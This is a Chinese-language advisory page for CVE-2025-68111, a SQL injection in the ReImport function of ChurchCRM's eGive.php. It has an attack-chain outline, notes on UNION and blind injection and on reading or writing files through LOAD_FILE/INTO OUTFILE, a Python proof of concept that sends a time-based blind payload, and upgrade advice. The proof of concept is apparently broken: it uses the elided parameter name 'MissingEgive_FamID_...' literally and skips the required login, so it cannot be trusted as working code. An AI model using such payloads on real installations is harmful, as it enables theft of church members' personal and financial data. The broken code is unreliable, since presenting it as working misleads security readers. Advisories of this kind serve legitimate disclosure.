CVE-2025-68111 CVSS 7.2 高危

CVE-2025-68111 ChurchCRM eGive.php ReImport功能SQL注入漏洞

披露日期: 2025-12-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-68111

漏洞类型

SQL注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源的教会管理系统。在6.5.3之前的版本中，eGive.php文件中的ReImport功能存在SQL注入漏洞。该漏洞允许具有财务权限的已认证用户通过操纵MissingEgive_FamID_... POST参数执行任意SQL查询。攻击者可以利用此漏洞未授权访问、修改或删除数据库中的敏感数据，包括教会成员信息、财务记录、捐赠数据等。由于该系统通常存储大量个人隐私信息和财务数据，漏洞的成功利用可能导致严重的数据泄露和财务损失。

技术细节

漏洞位于ChurchCRM的eGive.php文件中的ReImport功能模块。该功能在处理用户提交的MissingEgive_FamID_...参数时，直接将用户输入拼接到SQL查询语句中，未进行充分的输入验证和参数化查询处理。攻击者可以通过构造恶意的POST请求，在MissingEgive_FamID_...参数中注入SQL语句，如使用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。由于该功能需要finance权限，攻击者需要先获取具有相应权限的账户。攻击成功后，攻击者可以读取数据库中的任意表数据，包括用户密码哈希、管理员凭证、捐款记录等敏感信息，甚至可以通过LOAD_FILE或INTO OUTFILE等语句读取服务器本地文件或写入恶意文件。

攻击链分析

STEP 1

步骤1

攻击者获取具有finance权限的ChurchCRM账户凭据

STEP 2

步骤2

攻击者登录系统并访问eGive.php页面的ReImport功能

STEP 3

步骤3

攻击者构造包含SQL注入载荷的POST请求，操纵MissingEgive_FamID_...参数

STEP 4

步骤4

服务器将恶意输入拼接到SQL查询中并执行，攻击者获取数据库响应

STEP 5

步骤5

攻击者通过UNION注入、盲注等技术提取敏感数据或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-68111 PoC - ChurchCRM SQL Injection
# Target: ChurchCRM < 6.5.3
# Endpoint: /eGive.php (ReImport functionality)

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/churchcrm"

# SQL Injection payload to extract database version
# Using time-based blind SQL injection
payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"

# Construct the malicious POST request
data = {
    'MissingEgive_FamID_...': payload,
    'action': 'ReImport'
}

try:
    response = requests.post(
        f"{target_url}/eGive.php",
        data=data,
        timeout=10
    )
    print(f"[*] Request sent to {target_url}/eGive.php")
    print(f"[*] Status code: {response.status_code}")
    print(f"[*] Response time: {response.elapsed.total_seconds()}s")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

立即升级ChurchCRM至6.5.3版本。在升级前，可临时禁用eGive.php的ReImport功能或限制具有finance权限的用户账户，并加强对数据库访问日志的监控以便及时发现异常查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表